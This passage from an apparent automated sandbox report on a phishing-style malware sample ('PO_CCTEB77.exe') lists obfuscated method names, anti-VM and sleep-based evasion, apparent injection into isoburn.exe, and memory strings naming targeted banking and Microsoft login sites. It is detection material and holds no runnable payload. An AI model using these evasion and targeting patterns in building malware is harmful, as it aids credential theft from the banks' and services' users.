            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, JoGCmiYYfOfQ8BcErn.csHigh entropy of concatenated method names: 'ITqDj3clwE', 'fHkDnBKgo0', 'PXVDStXWrq', 'yYXDJPj8j5', 'S5sDvtF3a0', 'Ox9DOCqt7B', 'fu8DqdS0X0', 'TA6DCcUGMV', 'f7WDVaikwu', 'gquDP40Xev'
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, Co8hGcZ1jG2HeIX3U3F.csHigh entropy of concatenated method names: 'UjaNuMMKQG', 'vPJNtpOPMV', 'O5oNTqKWKg', 'N08NLnMu8m', 'RF3Ndc76S7', 'QBaNsNZHRq', 'gwON6omrjl', 'cgEN8YSKap', 'A51NiH973D', 'IQgNKJC8FN'
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, OaX5GnN3vZpiL2vUcv.csHigh entropy of concatenated method names: 'qcfTasylA', 'JZML1ODIG', 'D6msVFFqr', 'UKa60BqSF', 'ApkiMmws0', 'vQSKZ17Y6', 'fRQw046WLixV0ClQ6n', 'X2Q9dU1lmndFlR1uuy', 'dSdM1Taoi', 'U9EpkTxZ2'
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, yScInQZiXf0DN91u5cR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'b8LpjUXoJP', 'osSpnkeNRy', 'V1TpSZhUP7', 'rbRpJ8Z0tf', 'bTWpvGUA8O', 'CyypOsX33x', 'LYVpq3l34q'
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, NVAn9kFmQndg0SmsGB.csHigh entropy of concatenated method names: 'EZ7XduWFhN', 'LsMX6fX6Fv', 'G9X04yPKc2', 'aKa0Zk3eHf', 'cVb0oQIPl9', 'eqB0YeAtt2', 'DHd0bUEtZ4', 'cyv0m1fqlQ', 'Unr0F923dS', 'eli0riI4Gm'
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, beVtSRzLFlErf0ApAv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Rt3N915Tm5', 'vcMN5ZduSx', 'TQPN3JKIQk', 'TowNIBdLUp', 'aReNMO6tRB', 't28NNXjmPq', 'v3rNprjBjb'
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, XesiRELVHNOhhrfVEZ.csHigh entropy of concatenated method names: 'Got0LM1y6u', 'ql50sh7ICo', 'PXq08E7fRT', 'mNA0ifJFpv', 'xrh05ZyX1Z', 'IJ5038ORWv', 'X1O0IswAgN', 'jaU0MAHUqV', 'BsJ0NgmL6s', 'SlQ0pQZFKG'
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, OPoh1b4QEceDLrvkUk.csHigh entropy of concatenated method names: 'Tq0GeE8sts', 'BQ2GDwe6FF', 'T0jGXbdoFi', 'RXMGxrCa1g', 'jasG2lYWjl', 'hd7XvbgjG8', 'XsEXOSTgIH', 'NMSXqp3YMG', 'l8TXCmfvs4', 'arpXVGtmhk'
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, tAdYTf6ysPCeqbaoQh.csHigh entropy of concatenated method names: 'kkd98yAHjH', 'M9V9iMY51Q', 'wfH9kcLRXd', 'DWV9RXx8aa', 'XUa9ZIjge9', 'fPa9oZMTLj', 'Pcq9blxhQc', 'Sc99mYdKEj', 'sa19r8LuDD', 'fhv9fY5ySs'
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, ptRhSCx2027dPHp8xh.csHigh entropy of concatenated method names: 'CM6xBLuUA1', 'FKBx0dhl7B', 'WZYxGDq9j9', 'ftyGPPxmg3', 'OAwGzv712x', 'EpxxA2RHG2', 'rowxHLG7C9', 'IoqxUH0r98', 'U9mxlLM2Fv', 'uNvx7GrVDH'
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, ukVSDQTdm2TNByUUwo.csHigh entropy of concatenated method names: 'snOleBdIyM', 'gRdlBoQBZW', 'v8WlDnsa5a', 'O36l0clIpU', 'QT2lXMfnyu', 'fuulGucEUe', 'Ed1lxvqtik', 'wbvl2YxJhC', 'mDFlyXO4kB', 'KxVlE2XEuV'
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, Lnwr9D8u5CxConU7J6.csHigh entropy of concatenated method names: 'O6YNH77grY', 'lxXNlgSTiL', 'bU2N7p6n0g', 'vNDNBCaBch', 'YccND0eMPr', 'ppQNXBxVO4', 'zfGNGf488Z', 'RybMqST211', 'YVyMC0JQ1h', 'HnyMV9E0Ne'
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, KAEV8p9Wx9ew4CgZBa.csHigh entropy of concatenated method names: 'irtMBvBnRX', 'F8FMD0R98R', 'cesM0p4p30', 'nLqMXRmuWf', 'oh1MGSdNbn', 'n9sMxtSgvt', 'gIZM2JaTPJ', 'AB6MymNMCx', 'CTOMEVS32N', 'lG0Mwt6phm'
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, JFWZ8gSIFh0boXHiGm.csHigh entropy of concatenated method names: 'uQQxu8QlUN', 'j1gxtSOfB3', 'OVsxTx1GSY', 'fZWxLKxUiY', 'aXLxdAuZCm', 'BI7xsSPmR3', 'WsDx6XZNaj', 'yVkx8uW1KG', 'W5rxilIpbb', 'fbpxK23JDP'
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, oFEUOt3aVND6ltrtpp.csHigh entropy of concatenated method names: 'HJdICV5t9p', 'vDYIPsjTg4', 'a5RMAyYUqx', 'ETPMHxR4bg', 'OfBIfRoYxN', 'LIjIgJ6CFF', 'i1BIaNGfo9', 'Uf0IjCL9Uw', 'ESWInaxYBS', 'FCsIS3hGrc'
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, FhsQhTKtpoLR3r0wPq.csHigh entropy of concatenated method names: 'hemMkLhZcP', 'b3lMREWIfp', 'xaUM4qBftu', 'BvhMZRMMki', 'lnIMjPLgkw', 'MscMoQJqG4', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, hQZ8s0ylYf4am0IuMF.csHigh entropy of concatenated method names: 'tKtHxAlL6C', 'oMtH2dAw55', 'q2eHEqUXYK', 'lrgHwsqsLy', 'cklH5G3IkC', 'o0qH30o5A9', 'Jmuh8fbrmENpTTSta9', 'o4RcYbJ8aeGgvGcXBY', 'mwQHHTffNw', 'P39HlLUeBC'
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, oMIbrIj3x62M5QOT6l.csHigh entropy of concatenated method names: 'ToString', 'e2w3fbWBef', 'eoT3RfnL6p', 'E0H34Bm1dc', 'I093ZALaTK', 'EMy3o17Ew6', 'sgb3Y28P8h', 'QPK3bX2sRS', 'J9S3mJcw5Y', 'Q5s3FMYR8g'
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, NY2I822pxv8F9rHYWT.csHigh entropy of concatenated method names: 'Dispose', 'QeXHVn5HwU', 'z7NUR27HEy', 'XigccBVmtV', 'eW8HPFvhYb', 'oXIHzD9RnM', 'ProcessDialogKey', 'DQdUAmesRK', 'I7UUHSZqL5', 'IsEUUisTWK'
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, JoGCmiYYfOfQ8BcErn.csHigh entropy of concatenated method names: 'ITqDj3clwE', 'fHkDnBKgo0', 'PXVDStXWrq', 'yYXDJPj8j5', 'S5sDvtF3a0', 'Ox9DOCqt7B', 'fu8DqdS0X0', 'TA6DCcUGMV', 'f7WDVaikwu', 'gquDP40Xev'
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, Co8hGcZ1jG2HeIX3U3F.csHigh entropy of concatenated method names: 'UjaNuMMKQG', 'vPJNtpOPMV', 'O5oNTqKWKg', 'N08NLnMu8m', 'RF3Ndc76S7', 'QBaNsNZHRq', 'gwON6omrjl', 'cgEN8YSKap', 'A51NiH973D', 'IQgNKJC8FN'
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, OaX5GnN3vZpiL2vUcv.csHigh entropy of concatenated method names: 'qcfTasylA', 'JZML1ODIG', 'D6msVFFqr', 'UKa60BqSF', 'ApkiMmws0', 'vQSKZ17Y6', 'fRQw046WLixV0ClQ6n', 'X2Q9dU1lmndFlR1uuy', 'dSdM1Taoi', 'U9EpkTxZ2'
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, yScInQZiXf0DN91u5cR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'b8LpjUXoJP', 'osSpnkeNRy', 'V1TpSZhUP7', 'rbRpJ8Z0tf', 'bTWpvGUA8O', 'CyypOsX33x', 'LYVpq3l34q'
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, NVAn9kFmQndg0SmsGB.csHigh entropy of concatenated method names: 'EZ7XduWFhN', 'LsMX6fX6Fv', 'G9X04yPKc2', 'aKa0Zk3eHf', 'cVb0oQIPl9', 'eqB0YeAtt2', 'DHd0bUEtZ4', 'cyv0m1fqlQ', 'Unr0F923dS', 'eli0riI4Gm'
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, beVtSRzLFlErf0ApAv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Rt3N915Tm5', 'vcMN5ZduSx', 'TQPN3JKIQk', 'TowNIBdLUp', 'aReNMO6tRB', 't28NNXjmPq', 'v3rNprjBjb'
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: PO_CCTEB77.exe PID: 5628, type: MEMORYSTR
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788Thread sleep time: -240000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788Thread sleep time: -239874s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788Thread sleep time: -239765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788Thread sleep time: -239656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788Thread sleep time: -239546s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788Thread sleep time: -239437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788Thread sleep time: -239328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788Thread sleep time: -239215s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788Thread sleep time: -239107s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788Thread sleep time: -238983s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788Thread sleep time: -238874s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788Thread sleep time: -238765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788Thread sleep time: -238626s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788Thread sleep time: -238500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788Thread sleep time: -238390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788Thread sleep time: -238281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 3716Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 320Thread sleep count: 1837 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 320Thread sleep time: -3674000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 320Thread sleep count: 8131 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 320Thread sleep time: -16262000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe TID: 3652Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe TID: 3652Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe TID: 3652Thread sleep time: -54000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe TID: 3652Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe TID: 3652Thread sleep time: -38000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\isoburn.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0180096E rdtsc 3_2_0180096E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 240000Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 239874Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 239765Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 239656Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 239546Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 239437Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 239328Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 239215Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 239107Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 238983Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 238874Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 238765Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 238626Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 238500Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 238390Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 238281Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeWindow / User API: threadDelayed 637Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeWindow / User API: threadDelayed 2274Jump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeWindow / User API: threadDelayed 1837Jump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeWindow / User API: threadDelayed 8131Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeAPI coverage: 1.4 %
            Source: C:\Windows\SysWOW64\isoburn.exeAPI coverage: 2.9 %
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0301C280 FindFirstFileW,FindNextFileW,FindClose,5_2_0301C280
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 240000Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 239874Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 239765Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 239656Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 239546Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 239437Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 239328Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 239215Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 239107Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 238983Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 238874Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 238765Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 238626Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 238500Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 238390Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 238281Jump to behavior
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: 7e327r58.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 7e327r58.5.drBinary or memory string: discord.comVMware20,11696428655f
            Source: 7e327r58.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 7e327r58.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 7e327r58.5.drBinary or memory string: global block list test formVMware20,11696428655
            Source: 7e327r58.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4474473840.0000000000F7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
            Source: 7e327r58.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 7e327r58.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 7e327r58.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: 7e327r58.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 7e327r58.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 7e327r58.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 7e327r58.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 7e327r58.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 7e327r58.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: isoburn.exe, 00000005.00000002.4474142632.00000000031C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 7e327r58.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 7e327r58.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: 7e327r58.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 7e327r58.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 7e327r58.5.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: 7e327r58.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: 7e327r58.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 7e327r58.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 7e327r58.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 7e327r58.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 7e327r58.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: 7e327r58.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: 7e327r58.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 7e327r58.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 7e327r58.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 7e327r58.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0180096E rdtsc 3_2_0180096E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01800185 mov eax, dword ptr fs:[00000030h]3_2_01800185
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01864180 mov eax, dword ptr fs:[00000030h]3_2_01864180
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01864180 mov eax, dword ptr fs:[00000030h]3_2_01864180
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0187C188 mov eax, dword ptr fs:[00000030h]3_2_0187C188
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0187C188 mov eax, dword ptr fs:[00000030h]3_2_0187C188
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184019F mov eax, dword ptr fs:[00000030h]3_2_0184019F
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184019F mov eax, dword ptr fs:[00000030h]3_2_0184019F
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184019F mov eax, dword ptr fs:[00000030h]3_2_0184019F
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184019F mov eax, dword ptr fs:[00000030h]3_2_0184019F
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C6154 mov eax, dword ptr fs:[00000030h]3_2_017C6154
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C6154 mov eax, dword ptr fs:[00000030h]3_2_017C6154
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017BC156 mov eax, dword ptr fs:[00000030h]3_2_017BC156
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018861C3 mov eax, dword ptr fs:[00000030h]3_2_018861C3
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018861C3 mov eax, dword ptr fs:[00000030h]3_2_018861C3
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183E1D0 mov eax, dword ptr fs:[00000030h]3_2_0183E1D0
